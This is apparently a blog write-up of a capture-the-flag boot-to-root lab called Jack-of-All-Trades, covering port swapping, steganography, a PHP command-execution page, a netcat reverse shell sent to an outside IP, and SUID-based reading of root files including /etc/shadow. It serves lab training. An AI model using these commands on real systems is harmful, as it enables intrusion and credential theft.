Introduction

Boot-to-root originally designed for Securi-Tay 2020.

Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of a forgetful old toymaker and bring this lunatic down?

Goodo. It’s easy rated. Let’s begin.

Ports

nmap says we’ve got two ports: 22 and 80. So that’s SSH and HTTP respectively, right? Bzzzt. When I visited the website (defaulting to port 80) Firefox said:

SSH-2.0-OpenSSH_6.7p1 Debian-5

So that’s no good. Seems like Jack is tricky and has swapped his ports around. Okay then, does Firefox like http://10.10.14.31:22 ?

Actually, no. It says:

This address is restricted
This address uses a network port which is normally used for purposes other than Web browsing. Firefox has canceled the request for your protection.

In order to fix that, we have to go to about:config and add the string:

network.security.ports.banned.override with the value 22

Now we’re in.

Website

On the website we find a little bit of text and a few images, one of which is called stego. Hmm. Also in the page source we have a base64 encoded comment, which reveals a password. We can use the password on the stego file:

root@kali:/opt/tryhackme/jack# steghide extract -sf stego.jpg

And this gives us a message that says we’re looking in the wrong image. Lol. The one we want is actually the header image, and that gives us some more credentials, which we can enter at /recovery.php - a page we learned about in the page source of index.html.

/recovery.php

This leads us to a page at http://10.10.14.31:22/nnxhweOV/index.php, which has the message:

GET me a ‘cmd’ and I’ll run it for you Future-Jack.

So this is a little script to run PHP commands, eg:

http://10.10.14.31:22/nnxhweOV/index.php?cmd=whoami

With this we can get a shell, using:

/nnxhweOV/index.php?cmd=nc%20-e%20/bin/sh%2010.9.10.123%201234

On the box

Once we’re in as www-data we quickly find a file called jacks_password_list that contains a series of potential passwords. We can work through these until we find one that works for su jack. This also works for SSH if we want to go that way. Once we’ve escalated to jack, we get the user flag.

Privesc

As usual I ran linpeas, and it highlighted:

  
[+] Readable files belonging to root and readable by me but not world readable  
-rwsr-x--- 1 root dev 27536 Feb 25  2015 /usr/bin/strings  
-rwxr-x--- 1 root dev 233984 Nov  8  2014 /usr/bin/find

That’s a bit unusual. And in fact it’s our method, we can just do:

jack@jack-of-all-trades:/dev/shm$ /usr/bin/strings /root/root.txt  
ToDo:  
1.Get new penguin skin rug -- surely they wont miss one or two of those blasted creatures?  
2.Make T-Rex model!  
3.Meet up with Johny for a pint or two  
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?  
5.Remember to finish that contract for Lisa.  
6.Delete this: **FLAG HERE**

So there we go. We could also read /etc/shadow with this and grab the root hash if we wanted it.

Footnote

Since I last wrote something I also completed the rooms Overpass 2 and Tartarus, but I haven’t written them up. I may do so at some point, I’m not sure. I’ve also had a crack at Anonymous Playground and gotten the first flag, but the second flag requires a buffer overflow. That’s something that’s been on my radar, but which I haven’t learned about yet. So that’s the topic de jour and it’s my focus at the moment.